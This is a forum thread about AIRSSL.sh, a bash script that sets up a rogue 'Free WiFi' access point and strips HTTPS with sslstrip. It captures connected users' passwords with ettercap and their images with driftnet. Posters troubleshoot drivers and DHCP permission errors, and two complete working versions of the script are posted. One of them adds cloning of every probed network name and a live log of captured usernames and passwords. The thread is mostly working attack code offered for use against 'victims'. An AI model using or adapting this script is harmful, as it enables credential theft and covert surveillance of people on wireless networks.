NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

[aerokid240]

To all that may still encountering permission issues with the DHCP portion of the script, the following fix shouid take care of this (it did for me).

touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid

Enter these two commands in the script just before the code that starts dhcpd server.

Read More here at my blog.

[zestforlife]

Just wanted to say thanks for the script and help on irc killa. Your hint lead me to a bunch of possible solutions. One of which is taken straight from the ettercap man page. DOH!

"BRIDGED, it uses two network interfaces and forward the traffic from one to the other while performing sniffing and content filtering. This sniffing method is totally stealthy since there is no way to find that someone is in the middle on the cable. You can look at this method as a mitm attack at layer 1. You will be in the middle of the cable between two entities. Don’t use it on gateways or it will transform your gateway into a bridge. HINT: you can use the content filtering engine to drop packets that should not pass. This way ettercap will work as an inline IPS "

Haven't tried it yet, but it's a start in the right direction after being at a stalemate for days. Again, many thanks.

[xsv10]

I have a question in regards to POST #31. I've read several posts where there were reported issues with r8187 driver, but I was wondering if anyone else encountered a similar situation.

Whenever I run airbase-ng using the r8187 driver (AWUS036H) it doesn't send out any beacons. Does anyone have an alternate solution? Previously, I have used RTL8187 driver with the AWUS036H but dhcpd is incredibly slow.


- UPDATE
To elaborate more about my situation, i have a 500mw AWUS036H(older) and a 1000mw AWUS036H(newer) alpha cards, both of which are using the r8187 driver. Initially, "iwconfig" will recognize each card at 5 dbm. At this setting, I am able to see the beacons sent by airbase-ng. But after following POST #31, more specifically the part about adjusting the transmit power, I am unable to see the beacons being broadcasted by airbase-ng. I used the command "iwpriv wlan1 highpower 1" and "iwconfig wlan1 txpower 27". Only when I adjust the txpower to it's fullest capacity (whether it is 27dbm/500mw or 30dbm/1000mw) does airbase-ng stop sending beacons.

Has anyone encountered this issue or have a recommendation?

[duke1]

thanks for a great script and great thread.

I got this setup working on my VM of BT4 R1 with using both a WUSB54g v4 and AWUS050NH.

The only issue i've had so far is that the awus050nh isn't very stable and will dissapear as a AP after a short while - but this is probably my cards fault as it is in pretty bad shape.

I do, however, have one question - the first couple of times i tried to log on to gmail with a PC connected to the fake AP i only got to a page something like "please enable cookies in your browser" - has anyone else experienced something similar?

it is by no means a big issue though as this issue "resolved itself" after waiting a couple of minutes and trying again..

[aeksiler]

I cannot connect to internet using r8187

I also get "Can't create PID file ...: Permission denied" using both drivers.

[eikaf]

all works all right but when i try to connect to the internet through firefox it does not browse anything. I think it's a dns problem. Is it possible?

[eikaf]

i have got it to work with some little modification(merging this with a tutorial i have found), also removing the 2 commented lines in etter.conf. Probably the "not browsing issue" was a missing route add line. Here is the code if someone needs it. I have tested it with r8187(very bad performances) and rt73usb(a WUSB54GC with very good results instead):

Code:

#!/bin/bash
# (C)opyright 2009 - killadaninja
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.5.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.5.255;
option routers 192.168.5.129;
option domain-name-servers 8.8.8.8;
range 192.168.5.130 192.168.5.140;

}" > /pentest/wireless/airssl/dhcpd.conf

# Network question
echo
echo "AIRSSL 1.0 - killadaninja  "
echo
echo -n "Enter the networks gateway or DNS IP address, for example 192.168.1.254: "
read -e gatewayip
echo -n "Enter your interface thats connected to the internet, for example wlan0: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches, choose n if your are unsure... y or n "
read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface &
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface &
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 192.168.5.129 netmask 255.255.255.128
ifconfig at0 mtu 1400
route add -net 192.168.5.128 netmask 255.255.255.128 gw 192.168.5.129
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
#iptables -t nat -A POSTROUTING -o at0 -j MASQUERADE

# DHCP
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
echo "[+] Setting up DHCP..."
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" -pf /var/run/dhcpd/dhcpd.pid at0 &
sleep 3

# Sslstrip
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -a -k &
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode(remember to remove # from etter.conf), would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose n, y or n "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here. 
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 &
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 &
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), y or n "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata &
sleep 3
fi

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs, their credentials 
will be displayed in ettercap. You may use right/left mouse buttons 
to scroll up/down ettercaps xterm shell, ettercap will also save its output 
to /pentest/wireless/airssl/passwords unless you stated otherwise. 
Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."
killall xterm
killall driftnet
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit

[nlflux]

Hope someone can help,

The script runs fine (eth0 for my internet connection & wlan0 (rt73usb) for the fake ap creation)

I can see the fake AP but on the client it doesn't seem to get an IP from the dhcp?

Also tried to use mon0 to create the fake ap & same result

I am using BT4R1 on VMware with RT73USB (edimax )

SCREENSHOT

[killadaninja]

Hope someone can help,

The script runs fine (eth0 for my internet connection & wlan0 (rt73usb) for the fake ap creation)

I can see the fake AP but on the client it doesn't seem to get an IP from the dhcp?

Also tried to use mon0 to create the fake ap & same result

I am using BT4R1 on VMware with RT73USB (edimax )

SCREENSHOT

Would it be possible to try connecting BT directly to your network Non-natted, or check the other options inside Vm for networking?

[g60jon]

I hope you don't mind but I made a few additions to your script for a demonstration i needed to run at work.

I have added/changed the following:

• Shows routing table with gateway IP & Interface at startup
• Made the DHCP hostname match the chosen SSID (doesnt work in ALL mode)
• Added an ALL (a) mode to the FakeAP settings prompt (Instead of using the fixed SSID it clones ALL incoming probe requests)
• Fixed the DHCP PID permissions issue as discussed in this thread
• Added Interface and Monitor Names to the Fake AP Xterm window title
• Changed SSLstip to only log SSL Post instead of all SSL data as all the data is logged by ettercap anyway
• Added an SSLstip Log window showing just SSL Post data (much cleaner than watching ettercap output for USER:PASS details.
• Improved the Cleanup Routine - replaced 'killall' with 'kill ${PROCESSid}'s'

Here is my updated code in case your interested:

Code:

#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "Fake AP - SSL Strip"
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.1.254: "
read -e gatewayip
echo -n "Enter your interface thats connected to the internet, this should be listed above. For example wlan0: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches, would you like Airbase to clone ALL probe requests
choose n if your are unsure... Y or N or All? "
read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi


if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose n, y or n "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here. 
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), y or n "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials 
will be displayed in ettercap. You may use right/left mouse buttons 
to scroll up/down ettercaps xterm shell, ettercap will also save its output 
to /pentest/wireless/airssl/passwords unless you stated otherwise. 
Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit

Thank you again for making it available in the 1st place and i hope you find my changes usefull.

Regards
J